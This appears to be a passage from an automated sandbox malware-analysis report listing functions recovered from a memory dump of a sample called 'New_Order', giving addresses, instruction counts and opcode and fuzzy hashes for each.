                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: adcca47a2b272b82b5117d3557b7ba62c5bef3e229ac018b24d50d0115a10829
                                                                                                • Instruction ID: c2af23926d002c8850e836db5a8216f4544448b1fd7e7e37ad340d579bac3304
                                                                                                • Opcode Fuzzy Hash: adcca47a2b272b82b5117d3557b7ba62c5bef3e229ac018b24d50d0115a10829
                                                                                                • Instruction Fuzzy Hash: 52C15874128341CFD764DF19C494BAAB7E5FF88304F84492DEA8987291D774E904CFA2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0127C427 Relevance: .3, Instructions: 280COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 49bfafa2d352c245260649a1261f1e5b52c8e514b9e7379f03a8c9ca31104d1a
                                                                                                • Instruction ID: 09f705551c801913aa8919d8fa4b0c8350139e5b3f11e39589084d266b6fac13
                                                                                                • Opcode Fuzzy Hash: 49bfafa2d352c245260649a1261f1e5b52c8e514b9e7379f03a8c9ca31104d1a
                                                                                                • Instruction Fuzzy Hash: 87B17170A202678BDB34DF69D890BBAB7B5EF44704F0485E9D50AE7241EB71DD85CB20
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012AE5E7 Relevance: .3, Instructions: 278COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0528d988cc6c2e1fe188cd40515d2c71e4d3693a8345374a4ca2d998e20d2a51
                                                                                                • Instruction ID: deeaab5e3b4095fdb6484d95b6707c7093b4e198ff97b5e0539bb41e486d8d48
                                                                                                • Opcode Fuzzy Hash: 0528d988cc6c2e1fe188cd40515d2c71e4d3693a8345374a4ca2d998e20d2a51
                                                                                                • Instruction Fuzzy Hash: 8BA12631E206169FEB25DB5CC948BAEBBF4BB04B14F560165EB00AB2C0D7749D41CBD1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012C0185 Relevance: .3, Instructions: 276COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c129da461e74834968d9f723351df64de831d78b66d65c16201e5e39498d201c
                                                                                                • Instruction ID: 92dc3cde03598aa95c91d431fead5fd7cedb5a5f57bcc8dc13ea7bb2ed51c49a
                                                                                                • Opcode Fuzzy Hash: c129da461e74834968d9f723351df64de831d78b66d65c16201e5e39498d201c
                                                                                                • Instruction Fuzzy Hash: DDA1D074A20616DFDB25DF69C891BBAB7B5FF44B18F00422DFB05A7281DB74A841CB84
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01354500 Relevance: .3, Instructions: 275COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 611283bc90f9586177044102af0cc3d4a93246de12d913ecc9a408813e85d9a4
                                                                                                • Instruction ID: 546b5da00aee805cada8d18f3b0784d51b77ba8614f3d128c8621563a29170a0
                                                                                                • Opcode Fuzzy Hash: 611283bc90f9586177044102af0cc3d4a93246de12d913ecc9a408813e85d9a4
                                                                                                • Instruction Fuzzy Hash: 3FA1E072614601EFD729DF18C980F6ABBE9FF48B18F04092CE94997650E334ED40CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 013060E0 Relevance: .3, Instructions: 264COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 540dc1849dac174ae0de21313b776b39ea82fe3ee3b489511b8d30f49da8850e
                                                                                                • Instruction ID: fdd1c5455ddf09db1b937f5b9efd541daf24c9392e2d6a07e78fd25ca8193beb
                                                                                                • Opcode Fuzzy Hash: 540dc1849dac174ae0de21313b776b39ea82fe3ee3b489511b8d30f49da8850e
                                                                                                • Instruction Fuzzy Hash: 8391B3B1D0021AAFDF16CF68D8A1BBEBFF9AF48314F144159E610AB395D734D9108BA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0129E3F0 Relevance: .3, Instructions: 261COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1a677fd8b6c469345894a5cd557021214bc8e5d209bbce58a453a92968a6b0b1
                                                                                                • Instruction ID: 06282bb7254c39d0f51f5c38eb68edd0298cd4358f24b4736c59de24e6c55f3e
                                                                                                • Opcode Fuzzy Hash: 1a677fd8b6c469345894a5cd557021214bc8e5d209bbce58a453a92968a6b0b1
                                                                                                • Instruction Fuzzy Hash: CD915471A20616DBEF24DB2DD485BBE7BE1EF94714F06406AEA059B380E634D841C7A1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012D6ACC Relevance: .2, Instructions: 226COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d2d4820397c0a5619732b0ca30b01f2808e81f1aed76124f4362a4199efaf0aa
                                                                                                • Instruction ID: 854e77eef5166c38e1efefc1845b21575616fbacf9bae1dbcbf3b162139cc7f3
                                                                                                • Opcode Fuzzy Hash: d2d4820397c0a5619732b0ca30b01f2808e81f1aed76124f4362a4199efaf0aa
                                                                                                • Instruction Fuzzy Hash: 2D81A571E106169FDB28CFA9D890ABEBBF9FB58700F14852EE545E7640E334D940CBA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0134AB40 Relevance: .2, Instructions: 222COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                • Instruction ID: 564e12d4db9c22f8d7fbb43f5babb7bd0fe2be2268991aeec2698c5044d879c5
                                                                                                • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                • Instruction Fuzzy Hash: 02818071A102099FDF19CF98C890AAEBBF6FF88318F188569D9169B385D734E901CB54
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01276D10 Relevance: .2, Instructions: 216COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9a7e0e8092fb03d36406d4d0051a65fa04bffacfd869b5001ede92f8039cbd8e
                                                                                                • Instruction ID: 8959981f284f1d4824a93b1c83fa6840a3a773d5a9498ef97f31067c87921ab6
                                                                                                • Opcode Fuzzy Hash: 9a7e0e8092fb03d36406d4d0051a65fa04bffacfd869b5001ede92f8039cbd8e
                                                                                                • Instruction Fuzzy Hash: 58718C716247439BDF21DF29C981B6BB7E8BB48358F14492AFA55D7200E730E9C4CB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012BE284 Relevance: .2, Instructions: 212COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 74585c1d0e42d10b4474c69121b0fee311bffdc0b05465f0c2bdefdc06000d4f
                                                                                                • Instruction ID: e88be474e0e8a13fd17e698615b6c60677c64358267c4e2df62cd0df8dba9131
                                                                                                • Opcode Fuzzy Hash: 74585c1d0e42d10b4474c69121b0fee311bffdc0b05465f0c2bdefdc06000d4f
                                                                                                • Instruction Fuzzy Hash: 1E816F71A1060AEFDB25CFA9C880BEEBBB9FF48354F11442DE655A7250DB70AC45CB60
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0129C640 Relevance: .2, Instructions: 206COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7bd940b93c9a5dc5b49bcd312be26c455827e5d0b96400091a87e94348babcc9
                                                                                                • Instruction ID: b3e58f069fcc753598828484650be936b74978054b94e93f1d719daa5be5fd89
                                                                                                • Opcode Fuzzy Hash: 7bd940b93c9a5dc5b49bcd312be26c455827e5d0b96400091a87e94348babcc9
                                                                                                • Instruction Fuzzy Hash: 4D71BE75C2466ADBDB298F68C4917FEBBF8FF58710F54411AE982AB350D3719810CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 013347A0 Relevance: .2, Instructions: 202COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: cac4364ead5d459158efe9e0487446e64c22deeb2d239b99f9d0c9f8a7578616
                                                                                                • Instruction ID: d0ec18287656b663b9d08ee83869af4b03072464f2bacff2b0fe31b7bcee1d00
                                                                                                • Opcode Fuzzy Hash: cac4364ead5d459158efe9e0487446e64c22deeb2d239b99f9d0c9f8a7578616
                                                                                                • Instruction Fuzzy Hash: 4071A0B0910606EFEB30CF99DA55A9ABBF8FFD0308F00419EE604AB258C7318945CF58
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0129260B Relevance: .2, Instructions: 201COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9257536d168102540099460970a18199d711305ffcc5d91c5351686e673b9eb5
                                                                                                • Instruction ID: 76f10bc991cea4526518648745084600f3875d1eaaf37f59cd58d24c0b883ea7
                                                                                                • Opcode Fuzzy Hash: 9257536d168102540099460970a18199d711305ffcc5d91c5351686e673b9eb5
                                                                                                • Instruction Fuzzy Hash: 6D71EE31624242EFD715DF2CC484B6AB7E5FF84300F0485AAE9988B752DB74D846CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0130035C Relevance: .2, Instructions: 198COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                • Instruction ID: c01ead045e16e04ac8e9d3f2c0022c241a330e7986deb951889a04487b501482
                                                                                                • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                • Instruction Fuzzy Hash: 5D716A71A1060AEFDB15DFA9C994BEEBBF8FF48744F104569E505A7290DB30EA01CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 013162A0 Relevance: .2, Instructions: 198COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ad6c728dc6f6fdc7ffd90e33f23d726f602f27549bccce173a3a35bd92cdcdc9
                                                                                                • Instruction ID: eae6f96c38a223a97e630224f725444a1afee7b1c5d20f3f37a38a84d71db6ef
                                                                                                • Opcode Fuzzy Hash: ad6c728dc6f6fdc7ffd90e33f23d726f602f27549bccce173a3a35bd92cdcdc9
                                                                                                • Instruction Fuzzy Hash: 107128B2240701EFE73ACF58C842F66BBA6FF40718F154918E255976A4DBB5E844CB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01288AA0 Relevance: .2, Instructions: 197COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 643535ab1c9133de0ba4b3d858311beddad010c518c68a7e779a3ad759186fb7
                                                                                                • Instruction ID: 2ea6329ed380ade52b425796998ef8f7889b8524e60bf584361c463963e80ea8
                                                                                                • Opcode Fuzzy Hash: 643535ab1c9133de0ba4b3d858311beddad010c518c68a7e779a3ad759186fb7
                                                                                                • Instruction Fuzzy Hash: 9581D372A25316CFDB24DF98C588B6D77F9BF88310F95412DDA01AB281E774AD40CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0133A250 Relevance: .2, Instructions: 184COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 185122372c58cc7557713cd70aeb134a622179bfd434962d1fd7108683a6afcc
                                                                                                • Instruction ID: 781a3d3bced12aeaa7d79849f6e24709dc2d17bb03967a3b3386076a47b6671c
                                                                                                • Opcode Fuzzy Hash: 185122372c58cc7557713cd70aeb134a622179bfd434962d1fd7108683a6afcc
                                                                                                • Instruction Fuzzy Hash: 8C51B272504752AFD712DE68C844E6BB7E8EBC5758F01492DBA80EB250E770ED04C7A6
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01328350 Relevance: .2, Instructions: 161COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 363f97b5c0bce93d0b0f74952e44e6ad7733624a64ed8fe93b0a2537eee956d3
                                                                                                • Instruction ID: c76a0fc69f199244c9b7eb979bd460d2140e537e3f2d549b2f6f7dbef9ff0803
                                                                                                • Opcode Fuzzy Hash: 363f97b5c0bce93d0b0f74952e44e6ad7733624a64ed8fe93b0a2537eee956d3
                                                                                                • Instruction Fuzzy Hash: C151E370900719DFD731EF6AC880AABFBF8BF54718F10465ED29667AA0C7B0A545CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012BE443 Relevance: .2, Instructions: 158COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6c3dd12c4efc97e74c96a7c0d884d20725a26207c7ed1759e2fd2dcf31e5f6e4
                                                                                                • Instruction ID: d99d2a6ef30cdc78920d6d1d7eb8e22ce5acaa5dddf4f3cf963d6c673d4d14c7
                                                                                                • Opcode Fuzzy Hash: 6c3dd12c4efc97e74c96a7c0d884d20725a26207c7ed1759e2fd2dcf31e5f6e4
                                                                                                • Instruction Fuzzy Hash: 10513971220A46DFDB22EF69C9C0FAAB3B9FF14784F41046DE65697260EB34E944CB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01324180 Relevance: .2, Instructions: 156COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d4d5908f22d5cd1a555205ca6517642fb7f183c2b7383e79a623aaf9dbe67ebe
                                                                                                • Instruction ID: 77a748b0ca3683aa919d1611eddea3848381d8e5e38861e186b9636b89fac59f
                                                                                                • Opcode Fuzzy Hash: d4d5908f22d5cd1a555205ca6517642fb7f183c2b7383e79a623aaf9dbe67ebe
                                                                                                • Instruction Fuzzy Hash: 835189716083568FD750EF29D880A6BBBE5BFC8608F444A2DF689C7250EB30D915CB96
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012A45B1 Relevance: .2, Instructions: 156COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                • Instruction ID: 5b9c104d6ef5de769de4a72e3b4170fa4b1456b63b7b0d403231a1b73e22fba6
                                                                                                • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                • Instruction Fuzzy Hash: 2A519175E1028A9FDF15EF98C840BFEBBB5AF45750F484069EA01AB240D774DD44CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0130E9E0 Relevance: .2, Instructions: 154COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                • Instruction ID: 040f05dfc957357ae3f73d71ee3abd415bd70727ce3f00314c36c3addae23c15
                                                                                                • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                • Instruction Fuzzy Hash: 6351CA71F0461AEFEF129B94C8A0BAEBBF9AF04718F154A79D612671D0D7709E4087A0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01348B28 Relevance: .2, Instructions: 152COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ef743119ac4b3ad9a558fa05ad59ecfd095161d79d2b8a586b490498d8ac8b14
                                                                                                • Instruction ID: 484c11c27c6c1c1fa9e22e1b869570b3eaba9e2f8b03bf2d67bea2abb4e54c3f
                                                                                                • Opcode Fuzzy Hash: ef743119ac4b3ad9a558fa05ad59ecfd095161d79d2b8a586b490498d8ac8b14
                                                                                                • Instruction Fuzzy Hash: D74105707016119FEB29DBADC894B7BFBDAEF90228F048699E91587280DB34FC41C791
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0130CBF0 Relevance: .1, Instructions: 148COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 32b9b5434e367002eddc3c3dc3e02c86fdcb977eaf4c42e5558619d103227ce0
                                                                                                • Instruction ID: 1131efa525c743411a09027d6a74debaf88f8e34e44332a0d8d88234d276f700
                                                                                                • Opcode Fuzzy Hash: 32b9b5434e367002eddc3c3dc3e02c86fdcb977eaf4c42e5558619d103227ce0
                                                                                                • Instruction Fuzzy Hash: 77519CB190061AEFDB21DFA9C8A09AEBBF9FF48318B545659D505A3381D730AE01CF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0134A9D3 Relevance: .1, Instructions: 139COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                • Instruction ID: eddb6f7fbf2f46fda03c39ef4f346e6cc076033db767da16e35a3f31a48568d4
                                                                                                • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                • Instruction Fuzzy Hash: 17411C71655716AFDB25CF58C884A6AB7E9FF84218B04462EE91387640EB30FC04C7D0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012B01F8 Relevance: .1, Instructions: 138COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8cd93df04ac79edaba07171f523ae4f3339a612d49429c4e5615e32e00d8a9db
                                                                                                • Instruction ID: c937c3f3a83511fc855cbc1cbdbc72d7bb4c57a60d7fc1e02cd773c7c9b0945e
                                                                                                • Opcode Fuzzy Hash: 8cd93df04ac79edaba07171f523ae4f3339a612d49429c4e5615e32e00d8a9db
                                                                                                • Instruction Fuzzy Hash: 2241CB3192121ADBDB12DF98C480AEFBBB5BF48744F14816AFA19E7240D7349C45CBA8
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012AEBFC Relevance: .1, Instructions: 138COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e697cc9ab9948c99e040bc62488f74c36bbdbfef0448949712067943a3f5a526
                                                                                                • Instruction ID: 555cba0661e92856cd730d253e01e1b39f1ca35753522f75642489d86d6a86b5
                                                                                                • Opcode Fuzzy Hash: e697cc9ab9948c99e040bc62488f74c36bbdbfef0448949712067943a3f5a526
                                                                                                • Instruction Fuzzy Hash: 7341D9B12247029FDB24DF28C884A2BBBE9FF54324F41492DE657C7611D775E445CB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012C2750 Relevance: .1, Instructions: 137COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                • Instruction ID: 636376411b8ead7b8d30540b7ed9bb9119f00f2e21935749fdd7d868daf88c41
                                                                                                • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
